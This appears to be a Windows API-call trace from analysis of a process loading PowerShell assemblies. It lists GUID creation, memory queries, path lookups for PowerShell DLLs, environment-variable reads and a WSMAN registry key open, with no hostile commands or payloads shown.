	[0164.999] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xac511585, Data2=0x66b7, Data3=0x47fc, Data4=([0]=0x9c, [1]=0x84, [2]=0x4c, [3]=0xa2, [4]=0x9f, [5]=0x45, [6]=0x36, [7]=0x97))) returned 0x0
	[0165.000] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xc3930340, Data2=0xafc2, Data3=0x4a09, Data4=([0]=0x86, [1]=0x6b, [2]=0xb7, [3]=0x30, [4]=0x2f, [5]=0xf2, [6]=0x7c, [7]=0x43))) returned 0x0
	[0165.001] VirtualQuery (in: lpAddress=0x1ac0b0, lpBuffer=0x1acf70, dwLength=0x30 | out: lpBuffer=0x1acf70*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.002] VirtualQuery (in: lpAddress=0x1ac0b0, lpBuffer=0x1acf70, dwLength=0x30 | out: lpBuffer=0x1acf70*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.003] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xad356db3, Data2=0x36a3, Data3=0x4beb, Data4=([0]=0x84, [1]=0xfa, [2]=0x2a, [3]=0xe7, [4]=0x22, [5]=0x1, [6]=0x16, [7]=0xce))) returned 0x0
	[0165.006] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0x730473bd, Data2=0x57c4, Data3=0x4d24, Data4=([0]=0xa7, [1]=0xad, [2]=0xf2, [3]=0x3d, [4]=0x4e, [5]=0xba, [6]=0x56, [7]=0xa4))) returned 0x0
	[0165.006] VirtualQuery (in: lpAddress=0x1ac300, lpBuffer=0x1ad1c0, dwLength=0x30 | out: lpBuffer=0x1ad1c0*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.011] VirtualQuery (in: lpAddress=0x1ab970, lpBuffer=0x1ac830, dwLength=0x30 | out: lpBuffer=0x1ac830*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0166.033] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xd2f72cf, Data2=0x1dd6, Data3=0x4b7e, Data4=([0]=0x85, [1]=0xe2, [2]=0x99, [3]=0x5b, [4]=0x18, [5]=0x4b, [6]=0xd3, [7]=0x88))) returned 0x0
	[0166.034] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xde6ec019, Data2=0x7d15, Data3=0x4ae9, Data4=([0]=0x90, [1]=0x19, [2]=0x28, [3]=0xf7, [4]=0x5d, [5]=0x60, [6]=0xfb, [7]=0x40))) returned 0x0
	[0166.034] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xa88d1f9, Data2=0xb40b, Data3=0x4204, Data4=([0]=0xb7, [1]=0x66, [2]=0x2e, [3]=0x7a, [4]=0x28, [5]=0xca, [6]=0xdc, [7]=0xb6))) returned 0x0
	[0166.035] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0x426f01f7, Data2=0xba6f, Data3=0x44e6, Data4=([0]=0x8b, [1]=0x67, [2]=0x97, [3]=0xfc, [4]=0xb, [5]=0xc7, [6]=0x79, [7]=0xdd))) returned 0x0
	[0166.035] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0x243ee5a3, Data2=0xbba6, Data3=0x4cae, Data4=([0]=0xbd, [1]=0xd3, [2]=0xcb, [3]=0x52, [4]=0xd1, [5]=0x85, [6]=0x99, [7]=0xd9))) returned 0x0
	[0166.036] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xb45f09d5, Data2=0xd8f6, Data3=0x49e3, Data4=([0]=0xae, [1]=0x9, [2]=0x8c, [3]=0xcf, [4]=0x51, [5]=0x11, [6]=0x9e, [7]=0xe4))) returned 0x0
	[0166.036] VirtualQuery (in: lpAddress=0x1ac040, lpBuffer=0x1acf00, dwLength=0x30 | out: lpBuffer=0x1acf00*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0166.037] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0xb78a55b6, Data2=0xda7d, Data3=0x4ca0, Data4=([0]=0x9e, [1]=0xcc, [2]=0x77, [3]=0x1f, [4]=0x80, [5]=0x75, [6]=0x8f, [7]=0x6c))) returned 0x0
	[0166.037] VirtualQuery (in: lpAddress=0x1ac040, lpBuffer=0x1acf00, dwLength=0x30 | out: lpBuffer=0x1acf00*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0166.038] VirtualQuery (in: lpAddress=0x1ac040, lpBuffer=0x1acf00, dwLength=0x30 | out: lpBuffer=0x1acf00*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0175.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.944] CoCreateGuid (in: pguid=0x1ad690 | out: pguid=0x1ad690*(Data1=0x5f8a1a7f, Data2=0xa480, Data3=0x4ddd, Data4=([0]=0x98, [1]=0x6a, [2]=0xa6, [3]=0xa5, [4]=0x74, [5]=0x7b, [6]=0xa0, [7]=0xf6))) returned 0x0
	[0175.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac770, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.948] VirtualQuery (in: lpAddress=0x1ab6a0, lpBuffer=0x1ac560, dwLength=0x30 | out: lpBuffer=0x1ac560*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0175.949] VirtualQuery (in: lpAddress=0x1ab730, lpBuffer=0x1ac5f0, dwLength=0x30 | out: lpBuffer=0x1ac5f0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0175.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1acb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1aca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.950] VirtualQuery (in: lpAddress=0x1abeb0, lpBuffer=0x1acd70, dwLength=0x30 | out: lpBuffer=0x1acd70*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0175.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.951] VirtualQuery (in: lpAddress=0x1abeb0, lpBuffer=0x1acd70, dwLength=0x30 | out: lpBuffer=0x1acd70*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0175.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0175.952] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0178.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0178.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0178.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0179.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0179.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0179.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0179.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0179.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0179.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1ad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0196.709] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0196.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.709] CoTaskMemFree (pv=0x204490) 
	[0196.710] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0196.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.710] CoTaskMemFree (pv=0x204490) 
	[0196.711] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0196.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.712] CoTaskMemFree (pv=0x204490) 
	[0196.713] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0196.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0196.713] CoTaskMemFree (pv=0x204490) 
	[0197.082] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0197.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.082] CoTaskMemFree (pv=0x204490) 
	[0197.087] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0197.087] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.087] CoTaskMemFree (pv=0x204490) 
	[0197.088] CoTaskMemAlloc (cb=0x104) returned 0x204490
	[0197.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204490, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0197.088] CoTaskMemFree (pv=0x204490) 
	[0197.103] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad678 | out: phkResult=0x1ad678*=0x324) returned 0x0
